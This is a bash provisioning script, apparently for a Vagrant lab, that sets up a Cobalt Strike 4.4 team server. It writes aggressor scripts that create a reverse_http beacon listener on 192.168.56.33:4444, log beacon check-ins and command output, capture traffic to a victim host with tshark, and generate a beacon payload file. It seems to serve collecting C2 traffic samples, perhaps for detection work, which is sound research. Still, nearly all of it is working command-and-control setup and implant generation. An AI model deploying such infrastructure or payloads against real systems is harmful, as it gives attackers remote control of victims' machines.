#!/bin/bash

rm -rf Cobaltstrike-4.4
unzip /vagrant/cobaltstrike-4.4.zip
cd Cobaltstrike-4.4
chmod 755 teamserver agscript

echo "Team server starting ..."
tmux new-session -d -s collector -n teamserver 'sudo ./teamserver $ts_host $ts_password'
sleep 20  # wait for team server starting
nc -zv localhost 50050

cat << EOF > /tmp/listener.cna
on ready {
  listener_create_ext("$listener_name", "windows/beacon_http/reverse_http", %(host => "192.168.56.33", port => 4444, beacons => "192.168.56.33"));
  println("[Ready]" . formatDate("yyyy.MM.dd HH:mm:ss z") . " Existing listeners: " . listeners() . "\n");
}

on beacon_initial {
  println("[Initial]" . formatDate("HH:mm:ss z") . " Beacon " . \$1 . "\n");
}

on beacon_checkin {
  println("[Checkin]" . formatDate("HH:mm:ss z") . " Beacon ". \$1 . ", MSG: " . \$2 . "\n");
}

on beacon_input {
  println("[Input]" . formatDate("HH:mm:ss z") . " Beacon " . \$1 . ", MSG: " . \$2 . ", RESP: " . \$3 . "\n");
}

on beacon_output {
  println("[Output]" . formatDate("HH:mm:ss z") . " Beacon " . \$1 . ", MSG: " . \$2 . "\n");
}

# on * {
#   println("[ $+ $1 $+ ]: " . subarray(@_, 1));
# }
EOF

echo "Listener starting ..."
nohup ./agscript $ts_host 50050 monlis $ts_password /tmp/listener.cna &> /tmp/listener.log &
sleep 10
cat /tmp/listener.log
echo -n "agscript PID: "
pgrep agscript

nohup tshark -i $server_nic -f "tcp and host $victim_host" -c $packet_cnt -w /vagrant/data/$pcap_file_name &> /tmp/tshark.log &
sleep 5
echo -n "tshark PID: "
pgrep tshark

cat << 'EOF' > /tmp/beacon.cna
on ready {
  println("Existing listeners:");
  printAll(listeners());
  $$data = artifact_payload("$listener_name", "$beacon_format", "$arch", "process", "None");
  $$handle = openf(">/vagrant/data/$beacon_file");
  writeb($$handle, $$data);
  closef($$handle);
  println("[Ready]" . formatDate("yyyy.MM.dd HH:mm:ss z") . " Beacon " . "$beacon_file" . " created successfully!")
  closeClient();
}
EOF

echo "Generating beacon ..."
./agscript $ts_host 50050 bob $ts_password /tmp/beacon.cna &> /tmp/beacon.log
sleep 5
cat /tmp/beacon.log

